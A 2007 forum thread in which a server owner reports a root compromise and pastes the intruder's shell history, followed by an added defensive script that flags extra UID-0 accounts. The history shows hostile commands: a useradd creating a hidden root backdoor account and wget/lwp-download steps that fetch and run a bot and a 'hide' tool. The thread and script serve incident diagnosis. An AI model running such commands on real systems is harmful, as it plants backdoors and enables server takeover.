Discussion in 'General Discussion' started by w00ts!te, Nov 29, 2007.

  1. w00ts!te

    w00ts!te Registered

    Nov 23, 2007
    I got rooted.

    I have received this email:

    IMPORTANT: Do not ignore this email.
    This message is to inform you that the account lib has user id 0 (root privs).
    This could mean that your system was compromised (OwN3D). To be safe you should verify that your system has not been compromised.

    Syslogd and named are failing every 5 minutes and certain things like disk space usage and connections aren't working in a program I use. What's the best thing to do?

    Few WHM Items:
    Scan for Trojan Horses
    Appears Clean


    Scanning for Trojan Horses.....

    Possible Trojan - /usr/bin/xmlcatalog

    Possible Trojan - /usr/bin/xmllint

    Possible Trojan - /usr/lib/python2.4/site-packages/

    Possible Trojan - /usr/lib/python2.4/site-packages/

    Possible Trojan - /etc/cron.daily/logrotate

    And this is my history:
    58 last
    59 /sbin/ifconfig |grep inet
    60 /usr/sbin/useradd -o -u 0 -g 0 -d /usr/lib/libsh lib
    61 passwd lib
    62 cat /etc/hosts
    63 cat /etc/passwd
    64 su tf4
    65 su tf4
    66 cd /home/tf4
    67 ls
    68 pwd
    69 mkdir .cor ; cd .cor ; lwp-download ; perl bot.txt
    70 passwd mysql
    71 wget ; chmod +x hide ; ./hide

    What can I do? I got rooted big time.
    #1 w00ts!te, Nov 29, 2007
    Last edited: Nov 29, 2007
  2. ToddShipway

    ToddShipway Well-Known Member

    Nov 13, 2006
    Houston, TX
    At this point, you definitely want to remove this account. Since the server was rooted, you can attempt to look through access logs to find out exactly how the attacker got this access, but it's hard to say what all was done and it's best to wipe the server and start with a clean OS install to ensure a clean system.
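
The condition reported in the alert e-mail quoted in this thread (an account other than root with user id 0) can be checked directly, as can the `useradd -o -u 0` command that created it. This is an added example, not part of any post and not cPanel's own code; the function names are hypothetical and the sample data is constructed from lines in the first post (the `lib` entry's shell field is an assumption).

```shell
#!/bin/sh
# Added example (not from the thread): find extra UID-0 accounts and the
# shell-history commands that create them. Function names are hypothetical.

# Print "name uid home shell" for every passwd entry with UID 0 whose name is
# not "root". Reads the file given as $1, or stdin when no file is given.
find_uid0_accounts() {
    awk -F: '
        /^[ \t]*(#|$)/ { next }              # skip comments and blank lines
        NF < 7         { next }              # skip malformed entries
        $3 ~ /^0+$/ && $1 != "root" {        # "00" also resolves to UID 0
            print $1, $3, $6, $7
        }
    ' "${1:--}"
}

# Print "lineno: command" for history lines where useradd/adduser is given
# "-u 0" (numeric UID 0).
find_uid0_useradd() {
    awk '
        /(useradd|adduser)[ \t].*-u[ \t]*0+([ \t]|$)/ { print NR ": " $0 }
    ' "${1:--}"
}

# Constructed sample passwd data; the "lib" entry mirrors the useradd line in
# the post (its shell field is an assumption).
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
lib:x:0:0::/usr/lib/libsh:/bin/bash
tf4:x:32010:32010::/home/tf4:/bin/bash
EOF
}

# Constructed sample history, using commands quoted in the post.
sample_history() {
    cat <<'EOF'
last
/sbin/ifconfig |grep inet
/usr/sbin/useradd -o -u 0 -g 0 -d /usr/lib/libsh lib
passwd lib
EOF
}

sample_passwd  | find_uid0_accounts
sample_history | find_uid0_useradd
```

On a live system the same functions take a path, for example `find_uid0_accounts /etc/passwd`; on a host that is already rooted the local tools and files may themselves have been altered, so the result is only a starting point.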